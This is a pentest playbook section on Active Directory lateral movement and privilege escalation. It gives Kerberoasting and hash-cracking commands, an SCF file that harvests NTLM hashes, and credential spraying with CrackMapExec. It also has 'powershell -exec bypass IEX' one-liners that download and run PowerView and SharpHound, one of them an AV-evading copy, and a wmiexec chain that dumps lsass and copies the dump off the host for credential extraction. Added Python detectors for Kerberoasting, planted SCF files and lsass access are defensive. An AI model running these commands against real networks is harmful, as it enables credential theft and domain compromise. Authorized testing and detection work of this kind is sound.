# 6 - Lateral-Movement-and-Privilege-Escalation

File metadata and controls

175 lines (107 loc) · 5.18 KB

## All-in-one AD enumeration script

https://github.com/CasperGN/ActiveDirectoryEnumeration

## Kerberoast

From Linux, get the hashes using impacket:

```shell
GetUserSPNs.py -request -save -dc-ip <IP> domain/user
```

From Windows, use RiskySPN: https://github.com/cyberark/RiskySPN

Crack with hashcat:

```shell
hashcat -m 13100 -r rules/<rule> <hashes file> wordlists/<wordlist>
```
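A defender-side check for the pattern this section produces, added here as an illustration and not code from the playbook: it takes Security event 4769 fields (account, service name, ticket encryption type) and flags accounts that pull RC4-HMAC service tickets for several distinct SPNs within a short window; the event records are constructed.

```python
"""Flag Kerberoast-style TGS activity from Windows Security event 4769 fields.

Added illustration, not code from the playbook: a Kerberoast run requests
service tickets for many SPNs in a short window, and the tooling asks for
RC4-HMAC (Ticket Encryption Type 0x17) so the ticket cracks with hashcat
-m 13100. Events are dicts with the relevant 4769 fields; all records below
are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # 4769 "Ticket Encryption Type" value for RC4-HMAC

# Constructed sample: jsmith pulls RC4 tickets for four services within a
# minute, svc_backup makes one RC4 request, bob's traffic is AES (0x12).
SAMPLE_4769 = [
    {"time": "2024-01-10T09:00:01", "account": "jsmith@CORP", "service": "MSSQLSvc/db01.corp.local:1433", "etype": 0x17},
    {"time": "2024-01-10T09:00:02", "account": "jsmith@CORP", "service": "HTTP/web01.corp.local", "etype": 0x17},
    {"time": "2024-01-10T09:00:03", "account": "jsmith@CORP", "service": "krbtgt/CORP.LOCAL", "etype": 0x17},
    {"time": "2024-01-10T09:00:04", "account": "jsmith@CORP", "service": "CIFS/fs01.corp.local", "etype": 0x17},
    {"time": "2024-01-10T09:00:40", "account": "jsmith@CORP", "service": "MSSQLSvc/db02.corp.local:1433", "etype": 0x17},
    {"time": "2024-01-10T09:05:00", "account": "svc_backup@CORP", "service": "CIFS/fs01.corp.local", "etype": 0x17},
    {"time": "2024-01-10T09:06:00", "account": "bob@CORP", "service": "HTTP/web01.corp.local", "etype": 0x12},
    {"time": "2024-01-10T09:07:00", "account": "bob@CORP", "service": "MSSQLSvc/db01.corp.local:1433", "etype": 0x12},
]

def find_kerberoast_candidates(events, window=timedelta(minutes=5), min_spns=3):
    """Return {account: sorted SPNs} for accounts that requested RC4 service
    tickets for at least min_spns distinct SPNs inside any `window`."""
    per_account = defaultdict(list)
    for ev in events:
        # AES tickets and krbtgt (TGT) requests are not Kerberoast material
        if ev["etype"] != RC4_HMAC or ev["service"].lower().startswith("krbtgt/"):
            continue
        per_account[ev["account"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))

    hits = {}
    for account, reqs in per_account.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            spns = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(spns) >= min_spns:
                hits[account] = sorted(spns)
                break
    return hits

if __name__ == "__main__":
    for account, spns in find_kerberoast_candidates(SAMPLE_4769).items():
        print(f"{account}: {len(spns)} RC4 service tickets -> {spns}")
```

Tune `window` and `min_spns` to the environment; accounts that legitimately talk to many RC4-only services will need an allowlist.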

## Plant SCF files on file shares to get hashes or SMB relay

Find shares with Invoke-ShareFinder:

```powershell
powershell -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/sdcampbell/Internal-Pentest-Playbook/master/code/PoPow.ps1');Invoke-ShareFinder"
```

Or use the CrackMapExec `--shares` option and grep the output for WRITE.

Plant the SCF file on a writable share using the CrackMapExec scuffy module (`-M scuffy`), or manually create a text file with the ".scf" extension containing:

```
[Shell]
Command=2
IconFile=\\[your IP address]\share\pentest.ico
[Taskbar]
Command=ToggleDesktop
```

Use the Metasploit SMB server module or Responder to capture and crack, or relay, the hashes. With Responder, use the "--lm" option so that captured NTLMv1 hashes can be converted to NT hashes with crack.sh.
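A share-side check for planted SCF files, added here as an illustration and not code from the playbook: it parses the INI-style .scf format shown above and reports files whose IconFile is a UNC path; the two .scf files in `demo()` are constructed.

```python
"""Scan a directory tree (e.g. a mounted file share) for .scf files whose
IconFile points at a UNC path, the hash-harvesting pattern described above.

Added illustration, not code from the playbook. Explorer resolves IconFile as
soon as the folder is listed, so a UNC IconFile makes every browsing user
authenticate to that host. demo() writes constructed samples to a temp dir.
"""
import configparser
import os
import re
import tempfile

UNC_RE = re.compile(r"^\\\\[^\\]+\\")  # \\host\share\...

def parse_scf(text):
    """Return (Command, IconFile) from the [Shell] section ("" when absent)."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None  # not a well-formed INI file, so not a usable SCF either
    return cp.get("Shell", "Command", fallback=""), cp.get("Shell", "IconFile", fallback="")

def scan_share(root):
    """Walk root; return [(path, IconFile)] for .scf files with a UNC IconFile."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            parsed = parse_scf(text)
            if parsed and UNC_RE.match(parsed[1].strip()):
                hits.append((path, parsed[1]))
    return hits

def demo():
    """Constructed share: one planted SCF (UNC icon) and one benign local-icon SCF."""
    root = tempfile.mkdtemp()
    samples = {
        "Show Desktop.scf": "[Shell]\nCommand=2\nIconFile=\\\\10.0.0.5\\share\\pentest.ico\n[Taskbar]\nCommand=ToggleDesktop\n",
        "Desktop.scf": "[Shell]\nCommand=2\nIconFile=C:\\Windows\\System32\\shell32.dll,3\n[Taskbar]\nCommand=ToggleDesktop\n",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    return scan_share(root)
```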

## Spray creds for admin access using CrackMapExec

```shell
cme smb [/path/to/FileWithIPsOrNetworks] -u [username] -p [password] | tee /path/to/logfile.log
```

Note: If using a local account, add the `--local-auth` option. If using a hash instead of a password, use `-H [hash]` instead of `-p`.

## PowerView

Note: This links to my copy of PowerView.ps1 from PowerSploit which has been highly modified to bypass AV.

Note: You can find a Python version of PowerView which can be run remotely from a Linux system here: https://github.com/the-useless-one/pywerview

Prep work if running from a non-domain computer:

1. Start the 'Windows Remote Management' service.
2. Start PowerShell as administrator.
3. Enter:

```powershell
cd WSMAN:\localhost\client\
Set-Item TrustedHosts -Value *.[domain.com]
runas /netonly /user:[domain.com]\[user] powershell.exe
```

## Invoke-UserHunter

All Domain Admins:

```powershell
powershell -exec bypass -c "IEX (iwr 'https://raw.githubusercontent.com/sdcampbell/Internal-Pentest-Playbook/master/code/PoPow.ps1');Invoke-UserHunter -CheckAccess"
```

Single user:

```powershell
powershell -exec bypass -c "IEX (iwr 'https://raw.githubusercontent.com/sdcampbell/Internal-Pentest-Playbook/master/code/PoPow.ps1');Invoke-UserHunter -UserName <username> -CheckAccess"
```

## Invoke-ShareFinder

```powershell
powershell -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/sdcampbell/Internal-Pentest-Playbook/master/code/PoPow.ps1');Invoke-ShareFinder"
```

## Find all members of a group

```powershell
powershell -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/sdcampbell/Internal-Pentest-Playbook/master/code/PoPow.ps1');Get-NetGroupMember -GroupName <group>"
```

## BloodHound

Installation and walkthrough: https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/

Collection:

```powershell
powershell -exec bypass -c "IEX (iwr 'https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-Bloodhound -CollectionMethod all,loggedon"
```

## PrivExchange

Exchange your privileges for Domain Admin privs by abusing Exchange: https://github.com/dirkjanm/privexchange/

## Find Domain Admin sessions and dump credentials

```powershell
powershell -exec bypass -c "IEX (iwr 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-UserHunter -CheckAccess"
```

Note: I don't use Mimikatz on production systems. I dump lsass.exe and use Mimikatz on a system that I control to dump creds from the dump file.

Requires Impacket and pypykatz.

Install pypykatz:

```shell
pip3 install pypykatz
```

Run Impacket smbserver.py:

```shell
./smbserver.py <share name> <path to directory where you have procdump64.exe>
```

Run Impacket wmiexec.py:

```shell
./wmiexec.py <domain>/<username>:<password>@<Victim IP> 'copy \\<PTK IP>\<share>\procdump64.exe . & procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp & copy lsass.dmp \\<PTK IP>\<share>\ & del lsass.dmp & del procdump64.exe'
```

Dump credentials from the lsass dump file:

```shell
pypykatz lsa minidump lsass.dmp
```

Note: Sometimes you may get an error when using pypykatz. In that case you'll have to copy the dump file to a Windows system under your control and use Mimikatz.
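The endpoint-side signal for the lsass dump described above, added here as an illustration and not code from the playbook: it walks Sysmon event 10 (ProcessAccess) records and flags any non-allowlisted SourceImage that opened lsass.exe with PROCESS_VM_READ, the right a full memory dump needs; the allowlist and records are constructed.

```python
"""Flag processes that open lsass.exe with memory-read rights, the access a
procdump -ma or Mimikatz dump needs (Sysmon event 10, ProcessAccess).

Added illustration, not code from the playbook. PROCESS_VM_READ (0x0010) must
be in GrantedAccess to read lsass memory, so that bit from a SourceImage not on
a host-specific allowlist is the signal; the allowlist and the event records
below are constructed.
"""
PROCESS_VM_READ = 0x0010

# Constructed allowlist of binaries expected to touch lsass on this host;
# tune per environment (EDR/AV agents, wininit, csrss).
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\edr\agent.exe",
}

# Constructed Sysmon event 10 records (fields named as Sysmon names them)
SAMPLE_EVENT10 = [
    {"SourceImage": r"C:\Windows\Temp\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"SourceImage": r"C:\Program Files\EDR\agent.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Windows\Temp\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1FFFFF"},
]

def reads_lsass(event):
    """True when the target is lsass.exe and GrantedAccess includes VM_READ."""
    if not event["TargetImage"].lower().endswith(r"\lsass.exe"):
        return False
    return (int(event["GrantedAccess"], 16) & PROCESS_VM_READ) != 0

def suspicious_lsass_access(events, allowlist=ALLOWED_SOURCES):
    """Return SourceImages that read lsass memory and are not allowlisted."""
    return [ev["SourceImage"] for ev in events
            if reads_lsass(ev) and ev["SourceImage"].lower() not in allowlist]

if __name__ == "__main__":
    for src in suspicious_lsass_access(SAMPLE_EVENT10):
        print("lsass memory read by", src)
```

The allowlist must be by full path and kept short; an attacker copying a dumper into an allowlisted path is why path plus signer checks belong in a production rule.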

## Using native PowerShell cmdlets

PowerShell script to use the ActiveDirectory module without installing RSAT:

```powershell
Install-ActiveDirectoryModule -DllPath [path] -ADModulePath [path]
```

Enumerate domain information:

```powershell
Get-ADDomain
(Get-ADDomain).DomainSID.Value
```

Find Domain Controllers:

```powershell
Get-ADDomainController
```

Enumerate domain users:

```powershell
Get-ADUser -Filter * -Properties * | select name
Get-ADUser -Server [server fqdn]
Get-ADUser -Identity [username]
```

Get domain groups:

```powershell
Get-ADGroup -Filter * | select Name
Get-ADGroup -Filter {Name -like "*adm*"} | select Name
```

Get all the members of the Domain Admins group:

```powershell
Get-ADGroupMember -Identity "Domain Admins" -Recursive
```

Get a user's group membership:

```powershell
Get-ADPrincipalGroupMembership -Identity [username]
```

Get all domain computers:

```powershell
Get-ADComputer -Filter * | select Name
Get-ADComputer -Filter * -Properties *
```